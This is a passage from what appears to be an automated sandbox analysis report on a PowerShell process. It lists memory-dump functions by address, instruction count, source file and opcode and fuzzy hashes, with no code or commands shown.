                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 11ce2b931d10d7e57243e3a0e5dc6a4ae573140abeed382a559554e6d15da7ec
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b235dee41e2986b5e975198340331f5dc43c4229bdfef2cf82bef384509551fd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11ce2b931d10d7e57243e3a0e5dc6a4ae573140abeed382a559554e6d15da7ec
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E5178B2705249DFCF119B7DA8006AABBE6EFC6315F14807BD605CB252DA35CD81C3A2
                                                                                                                                                                                                                                                                                                                                  Function 07E4271F Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c2f66f99c0d755cfe564b506c516411fec90232b8f92874e710c0258b6331aa4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3eaf29e2f0a05f42ea7dec7a8656cf434f2846ed4a8a8f95227826a701471326
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2f66f99c0d755cfe564b506c516411fec90232b8f92874e710c0258b6331aa4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE516C71741206DFCB105B78A444AAABBEAFF85325F1481B6FA05CF291CB39C945C7B2
                                                                                                                                                                                                                                                                                                                                  Function 04FD7740 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7dbf6516ff852c61d72f03ec020e4eeac55584003d7a8defa358fb1a8020a0d5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9c055358b31dfe7d600907764c6cb76c81212b11b04b9920d5528948ca0a5cda
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7dbf6516ff852c61d72f03ec020e4eeac55584003d7a8defa358fb1a8020a0d5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951A4357042019FD704EB69D854A2ABBEBFFC9210B2985BAD509CF356EB35EC02C790
                                                                                                                                                                                                                                                                                                                                  Function 04FDBAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1086c55b2169919c768ea05eb78d7f0e5cae4bb0679c2879e9a8996e9f5a0083
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 725d4c1b2752d8c322bf3b6467ce8984f556c3d9a53a248adf33d5fc119a016a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1086c55b2169919c768ea05eb78d7f0e5cae4bb0679c2879e9a8996e9f5a0083
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA611A71E002488FCB14DFA9D584B9DBBF6FF88310F198169E819AB354EB34AC45CB60
                                                                                                                                                                                                                                                                                                                                  Function 04FDBAB0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 080552b3954d4e76dddc136722337418fbf5c6dc54cf678bd0cd9d1b700cef05
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a57e7fa192afc7e8e837574967e535f9d9005d5c83167e83f4725eb27a8e7152
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 080552b3954d4e76dddc136722337418fbf5c6dc54cf678bd0cd9d1b700cef05
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8511B71E01248DFCB14DFA9D584A9DBBF6FF88310F198169E819AB354EB34A846CB50
                                                                                                                                                                                                                                                                                                                                  Function 04FD6FB0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: edd8a3c3d0f752032a627e6b86a6286f982634c8e4dea145f011648bee873658
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c41e20abede61a5c0af3dcf074a48425ce4dd9b011e469a150225090dcbe88b0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edd8a3c3d0f752032a627e6b86a6286f982634c8e4dea145f011648bee873658
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5415234A04245CFCB05DF64C568AAEBFF2EF89314F184199D442EB3A5DB31AC02DB50
                                                                                                                                                                                                                                                                                                                                  Function 07E43CE1 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b4a33b92dcea73df7309adfa6119495f2adc14a99f2756e8e04bc7da16c1a883
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c2c83b5d4dae9d6440023c35e32be21d8992551e85b4a4299713850398c357dc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4a33b92dcea73df7309adfa6119495f2adc14a99f2756e8e04bc7da16c1a883
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C33124F1B02202DBCF24CF28E540A7AB7B3AF80658F1490A5D901EB256DB35DD84C7A5
                                                                                                                                                                                                                                                                                                                                  Function 04FDC388 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b49e40442a71cde0cb846b1459f4bceb8b61c14db2b5e9bda40417c79526a071
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5ea261e9b79403cd05a0ce990bedad4658fcb910140cf818dd7dc728a06343ec
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b49e40442a71cde0cb846b1459f4bceb8b61c14db2b5e9bda40417c79526a071
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D73170353006019FD705EB78E844B9EB7ABEFC4211F048639D60ACB765DF75A846CBA1
                                                                                                                                                                                                                                                                                                                                  Function 04FDAE60 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5b27bda32e26f1fd72ec66ed9552682eb4dd01eb1e1386ea494d9a0b0932d89e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1353cc01e733b34df0e408f9af3828bd54d5a7cd2c26f06a4898ae18ce2dc9a5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b27bda32e26f1fd72ec66ed9552682eb4dd01eb1e1386ea494d9a0b0932d89e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC317E70E012099FDB08DFA9D4947AEBBF6EF88314F188069E405EB754EB349C42CB55
                                                                                                                                                                                                                                                                                                                                  Function 04FDAE70 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 14ee3275980ab8f1e9623b4400e9c61f5bed9ddf4390346600f62fd71c7ab3b2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f37902bb94bdaaaed4ac7a3b01c01d8b082b74e8dbf9c811598a6a4febd8cb4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14ee3275980ab8f1e9623b4400e9c61f5bed9ddf4390346600f62fd71c7ab3b2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64312F70E012099FDB08DFA9D5947AEBBF6EF88310F188069E405EB754EB749C428B65
                                                                                                                                                                                                                                                                                                                                  Function 04FDAD28 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d16658b696821ece423d1ce76eaccb6314569e9356ee13de29082deee29e6a9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 104ddb7946f30724ac4c9e1ef3cac3c9b959d37b8150946c3128a589bad7d017
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d16658b696821ece423d1ce76eaccb6314569e9356ee13de29082deee29e6a9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 693161B8E002059FDB04EFB4D458AAEBBB2EF84300F25846DC155AB394DA79DD41CFA5
                                                                                                                                                                                                                                                                                                                                  Function 04FDAD38 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9de14554b1f0c91ab116a69af997d66ae2e14f5730c4217210bec7cd92299cbb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dc4fa64831faf22f8065c79243be21815868fbc25b6e93218235e2aac6f25d7f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9de14554b1f0c91ab116a69af997d66ae2e14f5730c4217210bec7cd92299cbb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F3184B8E002099FDB04EFA4D454AAE77B7EF84300F108469C115AB394DA38ED01CFA5
                                                                                                                                                                                                                                                                                                                                  Function 0367F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2485244583.000000000367D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0367D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_367d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 805cc5608774385536a36e94d1aa7115b58f3dbc70906062f6a8a6f4cda6b1ab
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 285397e2c1333f7aedac71fe183037621dc79256cabaad588249c26440f8bafb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 805cc5608774385536a36e94d1aa7115b58f3dbc70906062f6a8a6f4cda6b1ab
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F219F75608200EFCB05DF54DA80F26BB65FB88314F64C5A9E9094E35BC73AD456CBB1
                                                                                                                                                                                                                                                                                                                                  Function 04FD93F0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 74ec9a1edbf0b852cded3c738de39cd10ed79d064847f94fd27c6ef4cc693d2b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 297c68620965a984b592beff21d207942ec55e48a4c55bb4c54dddd086c376c9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74ec9a1edbf0b852cded3c738de39cd10ed79d064847f94fd27c6ef4cc693d2b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56319FB1D067448EDB60CF6AD08879AFFE2EF89310F28C41DC44D97205D6B46446CB61
                                                                                                                                                                                                                                                                                                                                  Function 04FD9400 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39cf12d282a2620e942a749b270f946c56ea1c8ce8ccdff014e1bf8a415c4f23
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8bfb01c8653012f016439ff7e8db7a80357cac107485ca0f1a669fba2c49c504
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39cf12d282a2620e942a749b270f946c56ea1c8ce8ccdff014e1bf8a415c4f23
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F217CB1D017448EDB60CFAAC48878AFFF6EF89310F28C42ED40D97245D6B46482CB61
                                                                                                                                                                                                                                                                                                                                  Function 07E41968 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8be1521f2ee9c4887112140f274b163185ce3751631fba52b65b917ec96095ad
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fa677b84de939cca6c2b26c2337e59c70a8d2291f672717aa1e8d10308006d6b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8be1521f2ee9c4887112140f274b163185ce3751631fba52b65b917ec96095ad
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE21F3F250A38ACFCF128B68E980A657FF2AF46214F0952A7D6448B252D735D9C4C762
                                                                                                                                                                                                                                                                                                                                  Function 04FD767C Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fec1456c392e39fcaa4b0211c83d406a3057dc7b5d035b5bd10de8e6b3b1f0a1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dca1dc7c0375045b8de4de8ef0c2ecd3ff6931a4f09b9eca2de5f29bdd530a38
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fec1456c392e39fcaa4b0211c83d406a3057dc7b5d035b5bd10de8e6b3b1f0a1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A113039B002188FCB04EBACE9409DD77F6EFC8251B1440A9E509DB365DB35ED06CB91
                                                                                                                                                                                                                                                                                                                                  Function 07E428DF Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ada2ee1423e86f279b3d50bfc81477d64e38f7842b02b2dc6f4a98d1ca298616
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c24eadd140bb8b23cd52da889dee3446c78c600c431cf63ff969b9403889fe5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ada2ee1423e86f279b3d50bfc81477d64e38f7842b02b2dc6f4a98d1ca298616
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B011D6B1A12206DFCB20CF6CD980BA6B7F9BF84315F049166EB049B211C731D980CBA1
                                                                                                                                                                                                                                                                                                                                  Function 07E4198B Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 968427175aed1c87145979ad71c1504bdd488466e3e50edc818fd8ca264aaf4a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 07cd80b854ef272591342c5a1c6388f5705f318477170043a45a43ae21030931
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 968427175aed1c87145979ad71c1504bdd488466e3e50edc818fd8ca264aaf4a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F211B6F1A0124ADFDF20CF59E544BA6B7E1EB45355F049166D60587211D731D9C0CB91
                                                                                                                                                                                                                                                                                                                                  Function 0367F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2485244583.000000000367D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0367D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_367d000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 420ccbb416cd497a150443ab3502b91f9d2805364ebbc8e782b1e461638a8852
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56216A76504240DFCB06CF14DAC4B16BF72FB88214F28C5A9D9494E65BC33AD46ACBA1
                                                                                                                                                                                                                                                                                                                                  Function 04FDBCE0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4301f3ba07c7a204d8417372ee4c4ccf8c07071aa279d30a707194c67afb8ae2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c09ed9147633b640b0cb5619a80260fe7e5c3b9390c5b5914e584aee59f23b8e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4301f3ba07c7a204d8417372ee4c4ccf8c07071aa279d30a707194c67afb8ae2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501D6316087445FD715CF79D5946967FE1AF46210F1944EED08ACB6A2DA70F845C701
                                                                                                                                                                                                                                                                                                                                  Function 04FDDC98 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17d3af15ffe3c1858d7ae1a09a784957f6e7b716d53778f08fe2c4a22cc8469a
